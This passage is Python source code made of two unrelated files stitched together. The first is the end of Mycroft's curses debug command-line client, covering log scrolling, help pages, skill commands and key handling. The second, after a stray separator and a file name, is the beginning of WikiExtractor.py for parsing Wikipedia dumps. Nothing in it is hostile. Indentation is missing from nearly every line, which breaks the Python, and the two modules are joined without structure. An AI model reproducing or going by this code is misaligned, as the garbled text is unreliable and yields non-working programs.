meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(
x,
y,
" " +
make_titlebar(
"= GUI",
gui_width -
1) +
" ",
clr=CLR_HEADING)
cnt = len(gui_text) + 1
if cnt > curses.LINES - 15:
cnt = curses.LINES - 15
for i in range(0, cnt):
draw(x, y + 1 + i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x + 2, y + 1 + i, gui_text[i], pad=gui_width - 3)
else:
draw(x + 2, y + 1 + i, "*" * (gui_width - 3))
draw(x + (gui_width - 1), y + 1 + i, "!", clr=CLR_HEADING)
draw(x, y + cnt, " " + "-" * (gui_width - 2) + " ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_redraw
global auto_scroll
global size_log_area
if time.time() - last_redraw > REDRAW_FREQUENCY:
            # Do a full-screen redraw periodically to clear any
            # noise from non-curses text that gets output to the
            # screen (e.g. modules that do a 'print')
scr.clear()
last_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS - 1 - len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS - 1 - len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG2)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG1)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS - 20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: " + last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [('Log Scrolling shortcuts',
[("Up / Down / PgUp / PgDn",
"scroll thru history"),
("Ctrl+T / Ctrl+PgUp",
"scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn",
"scroll to bottom of logs" + "(jump to newest)"),
("Left / Right",
"scroll long lines left/right"),
("Home / End",
"scroll to start/end of long lines")]),
("Query History shortcuts",
[("Ctrl+N / Ctrl+Left",
"previous query"),
("Ctrl+P / Ctrl+Right",
"next query")]),
("General Commands (type ':' to enter command mode)",
[(":quit or :exit",
"exit the program"),
(":meter (show|hide)",
"display the microphone level"),
(":keycode (show|hide)",
"display typed key codes (mainly debugging)"),
(":history (# lines)",
"set size of visible history buffer"),
(":clear",
"flush the logs")]),
("Log Manipulation Commands",
[(":filter 'STR'",
"adds a log filter (optional quotes)"),
(":filter remove 'STR'",
"removes a log filter"),
(":filter (clear|reset)",
"reset filters"),
(":filter (show|list)",
"display current filters"),
(":find 'STR'",
"show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)",
"set logging level"),
(":log bus (on|off)",
"control logging of messagebus messages")]),
("Skill Debugging Commands",
[(":skills",
"list installed Skills"),
(":api SKILL",
"show Skill's public API"),
(":activate SKILL",
"activate Skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL",
"deactivate Skill"),
(":keep SKILL",
"deactivate all Skills except the indicated Skill")])]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " " + w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""Show list of loaded Skills in as many column as necessary."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded Skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def show_skill_api(skill, data):
"""Show available help on Skill's API."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Skill-API for {}".format(skill),
CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 4
prepare_page()
for key in data:
color = curses.color_pair(4)
scr.addstr(row, column, "{} ({})".format(key, data[key]['type']),
CLR_HEADING)
row += 2
if 'help' in data[key]:
help_text = data[key]['help'].split('\n')
for line in help_text:
scr.addstr(row, column + 2, line, color)
row += 1
row += 2
else:
row += 1
if row == curses.LINES - 5:
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 5:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI loop
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
    #     find abc def      returns: def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def wait_for_any_key():
"""Block until key is pressed.
This works around curses.error that can occur on old versions of ncurses.
"""
while True:
try:
scr.get_wch() # blocks
except curses.error:
# Loop if get_wch throws error
time.sleep(0.05)
else:
break
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
        # List loaded skills
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
wait_for_any_key()
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
elif "api" in cmd:
parts = cmd.split()
if len(parts) < 2:
return
skill = parts[1]
message = bus.wait_for_response(Message('{}.public_api'.format(skill)))
if message:
show_skill_api(skill, message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time() - start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time() - start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
                last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')},
{'client_name': 'mycroft_cli',
'source': 'debug_cli',
'destination': ["skills"]}
))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]},
{'client_name': 'mycroft_simple_cli',
'source': 'debug_cli',
'destination': ["skills"]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
    except Exception as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
        Returns: MessageBusClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
WikiExtractor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Version: 3.0 (July 22, 2020)
# Author: Giuseppe Attardi (attardi@di.unipi.it), University of Pisa
#
# Contributors:
# Antonio Fuschetto (fuschett@aol.com)
# Leonardo Souza (lsouza@amtera.com.br)
# Juan Manuel Caicedo (juan@cavorite.com)
# Humberto Pereira (begini@gmail.com)
# Siegfried-A. Gevatter (siegfried@gevatter.com)
# Pedro Assis (pedroh2306@gmail.com)
# Wim Muskee (wimmuskee@gmail.com)
# Radics Geza (radicsge@gmail.com)
# Nick Ulven (nulven@github)
#
# =============================================================================
# Copyright (c) 2009-2020. Giuseppe Attardi (attardi@di.unipi.it).
# =============================================================================
# This file is part of Tanl.
#
# Tanl is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# Tanl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
"""Wikipedia Extractor:
Extracts and cleans text from a Wikipedia database dump and stores output in a
number of files of similar size in a given directory.
Each file will contain several documents in the format:
<doc id="" url="" title="">
...
</doc>
If the program is invoked with the --json flag, then each file will
contain several documents formatted as json objects, one per line, with
the following structure
{"id": "", "revid": "", "url": "", "title": "", "text": "..."}
The program performs template expansion by preprocessing the whole dump and
collecting template definitions.
"""
import argparse
import bz2
import logging
import os.path
import re # TODO use regex when it will be standard
import sys
from io import StringIO
from multiprocessing import Queue, Process, cpu_count
from timeit import default_timer
sys.path.append('/content/drive/MyDrive/Thesis/projectFiles/wikiextractor/wikiextractor')
from extract import Extractor, ignoreTag, define_template, acceptedNamespaces
# ===========================================================================
# Program version
__version__ = '3.0.5'
##
# Defined in <siteinfo>
# We include as default Template, when loading external template file.
knownNamespaces = set(['Template'])
##
# The namespace used for template definitions
# It is the name associated with namespace key=10 in the siteinfo header.
templateNamespace = ''
templatePrefix = ''
##
# The namespace used for module definitions
# It is the name associated with namespace key=828 in the siteinfo header.
moduleNamespace = ''
# ----------------------------------------------------------------------
# Modules
# Only minimal support
# FIXME: import Lua modules.
modules = {
'convert': {
'convert': lambda x, u, *rest: x + ' ' + u, # no conversion
}
}
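# E.g. modules['convert']['convert']('5', 'km') simply returns '5 km'; no real unit
# conversion is attempted.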
# ----------------------------------------------------------------------
# Expand using WikiMedia API
# import json
# def expandTemplates(text):
# """Expand templates invoking MediaWiki API"""
# text = urlib.urlencodew(text.encode('utf-8'))
# base = urlbase[:urlbase.rfind('/')]
# url = base + "/w/api.php?action=expandtemplates&format=json&text=" + text
# exp = json.loads(urllib.urlopen(url))
# return exp['expandtemplates']['*']
# ------------------------------------------------------------------------------
# Output
class NextFile():
"""
Synchronous generation of next available file name.
"""
filesPerDir = 100
def __init__(self, path_name):
self.path_name = path_name
self.dir_index = -1
self.file_index = -1
def next(self):
self.file_index = (self.file_index + 1) % NextFile.filesPerDir
if self.file_index == 0:
self.dir_index += 1
dirname = self._dirname()
if not os.path.isdir(dirname):
os.makedirs(dirname)
return self._filepath()
def _dirname(self):
char1 = self.dir_index % 26
char2 = int(self.dir_index / 26) % 26
return os.path.join(self.path_name, '%c%c' % (ord('A') + char2, ord('A') + char1))
def _filepath(self):
return '%s/wiki_%02d' % (self._dirname(), self.file_index)
class OutputSplitter():
"""
File-like object, that splits output to multiple files of a given max size.
"""
def __init__(self, nextFile, max_file_size=0, compress=True):
"""
:param nextFile: a NextFile object from which to obtain filenames
to use.
:param max_file_size: the maximum size of each file.
        :param compress: whether to write data with bzip compression.
"""
self.nextFile = nextFile
self.compress = compress
self.max_file_size = max_file_size
self.file = self.open(self.nextFile.next())
def reserve(self, size):
if self.file.tell() + size > self.max_file_size:
self.close()
self.file = self.open(self.nextFile.next())
def write(self, data):
self.reserve(len(data))
if self.compress:
self.file.write(data.encode('utf-8'))
else:
self.file.write(data)
def close(self):
self.file.close()
def open(self, filename):
if self.compress:
return bz2.BZ2File(filename + '.bz2', 'w')
else:
return open(filename, 'w')
# ----------------------------------------------------------------------
# READER
tagRE = re.compile(r'(.*?)<(/?\w+)[^>]*>(?:([^<]*)(<.*?>)?)?')
# 1 2 3 4
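# For a line such as '  <title>Foo</title>' this yields group(2) == 'title',
# group(3) == 'Foo' and group(4) == '</title>' (m.lastindex == 4, the open-close case).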
def load_templates(file, output_file=None):
"""
Load templates from :param file:.
:param output_file: file where to save templates and modules.
"""
global templateNamespace, templatePrefix
templatePrefix = templateNamespace + ':'
global moduleNamespace, modulePrefix
modulePrefix = moduleNamespace + ':'
articles = 0
templates = 0
page = []
inText = False
if output_file:
output = open(output_file, 'w')
for line in file:
#line = line.decode('utf-8')
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
elif tag == 'title':
title = m.group(3)
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
if not output_file and not templateNamespace: # do not know it yet
# we reconstruct it from the first title
colon = title.find(':')
if colon > 1:
templateNamespace = title[:colon]
templatePrefix = title[:colon + 1]
# FIXME: should reconstruct also moduleNamespace
if title.startswith(templatePrefix):
define_template(title, page)
templates += 1
# save templates and modules to file
if output_file and (title.startswith(templatePrefix) or
title.startswith(modulePrefix)):
output.write('<page>\n')
                output.write(' <title>%s</title>\n' % title)
output.write(' <ns>10</ns>\n')
output.write(' <text>')
for line in page:
                    output.write(line)
output.write(' </text>\n')
output.write('</page>\n')
page = []
articles += 1
if articles % 100000 == 0:
logging.info("Preprocessed %d pages", articles)
if output_file:
output.close()
logging.info("Saved %d templates to '%s'", templates, output_file)
return templates
def decode_open(filename, mode='rt', encoding='utf-8'):
"""
    Open a file, decode and decompress, depending on extension `gz` or `bz2`.
:param filename: the file to open.
"""
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode, encoding=encoding)
elif ext == '.bz2':
return bz2.open(filename, mode=mode, encoding=encoding)
else:
return open(filename, mode, encoding=encoding)
def process_dump(input_file, template_file, out_file, file_size, file_compress,
process_count, html_safe):
"""
:param input_file: name of the wikipedia dump file; '-' to read from stdin
:param template_file: optional file with template definitions.
:param out_file: directory where to store extracted data, or '-' for stdout
:param file_size: max size of each extracted file, or None for no max (one file)
:param file_compress: whether to compress files with bzip.
:param process_count: number of extraction processes to spawn.
"""
global knownNamespaces
global templateNamespace, templatePrefix
global moduleNamespace, modulePrefix
urlbase = '' # This is obtained from <siteinfo>
input = decode_open(input_file)
# collect siteinfo
for line in input:
line = line #.decode('utf-8')
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'base':
# discover urlbase from the xml dump file
# /mediawiki/siteinfo/base
base = m.group(3)
urlbase = base[:base.rfind("/")]
elif tag == 'namespace':
knownNamespaces.add(m.group(3))
if re.search('key="10"', line):
templateNamespace = m.group(3)
templatePrefix = templateNamespace + ':'
elif re.search('key="828"', line):
moduleNamespace = m.group(3)
modulePrefix = moduleNamespace + ':'
elif tag == '/siteinfo':
break
if expand_templates:
# preprocess
template_load_start = default_timer()
if template_file and os.path.exists(template_file):
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", template_file)
file = decode_open(template_file)
templates = load_templates(file)
file.close()
else:
if input_file == '-':
# can't scan then reset stdin; must error w/ suggestion to specify template_file
raise ValueError("to use templates with stdin dump, must supply explicit template-file")
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", input_file)
templates = load_templates(input, template_file)
input.close()
input = decode_open(input_file)
template_load_elapsed = default_timer() - template_load_start
logging.info("Loaded %d templates in %.1fs", templates, template_load_elapsed)
if out_file == '-':
output = sys.stdout
if file_compress:
